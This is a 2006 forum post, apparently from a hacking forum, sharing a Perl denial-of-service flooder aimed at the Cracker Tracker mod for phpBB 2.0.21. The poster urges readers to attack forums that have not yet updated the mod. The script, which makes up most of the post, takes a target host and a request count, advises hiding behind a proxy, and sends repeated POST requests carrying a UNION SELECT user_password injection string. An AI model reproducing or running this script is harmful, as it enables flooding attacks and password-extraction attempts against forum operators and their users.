Cracker Tracker V 4.1.7 DoS flooder - phpBB 2.0.21

Started by DarkGenesis, 02 de August , 2006, 10:14:03 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

DarkGenesis

* Foi lançada hoje "02 de Agosto" a nova versão do Cracker Tracker
Muitos foruns PhpBB que usam o CT ainda não atualizaram suas versões.
Essa é a hora.  ;D

Cracker Tracker V 4.1.8

#!/usr/bin/perl

print q{
_________________________________________________________________________


           /      \
        \  \  ,,  /  /
         '-.`\()/`.-'
        .--_'(  )'_--.
       / /` /`""`\ `\ \           * SpiderZ ForumZ Security *
        |  |  ><  |  |
        \  \      /  /
            '.__.'       

Author: SpiderZ
Cracker Tracker Professional Version 4.1.7 phpBB 2.0.21
Sito: www.spiderz.altervista.org
Sito2: www.spiderz.netsons.org
_________________________________________________________________________

Download Mod: www.sourceforge.net/project/showfiles.php?group_id=154972
_________________________________________________________________________

};
use IO::Socket;
print q{
Url Example: website.com without www & http://
};
$host = <STDIN>;
chop ($host);
print q{
Folder Example: /phpBB2/ - /Forum/
};
$pth = <STDIN>;
chop ($pth);
print q{
Number dos flooder => 1 / 10000 <=
Attention you use the proxy
};
$while = <STDIN>;
chop ($while);
while($x != $while )
{
$sock = new IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "CONNECTION FAILED";
die "\nThe Socket: $!\n" unless $sock;
print $sock "POST $pth"."index.php?c=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_users%20where%20user_id= HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
close($sock);
syswrite STDOUT, "°";
$x++;
}
print q{

};
print "www.$host + $pth + /ctracker/logs/counter.txt";
print q{ <=

};
print "www.$host + $pth + /ctracker/logs/logfile_flood.txt";
print q{ <=

};
print "www.$host + $pth + /ctracker/logs/logfile_proxy.txt";
print q{ <=

};
print "www.$host + $pth + /ctracker/logs/logfile_worms.txt";
print q{ <=

};
print q{
-------------------------------------------------------------------------
Attacco Completato !
-------------------------------------------------------------------------
};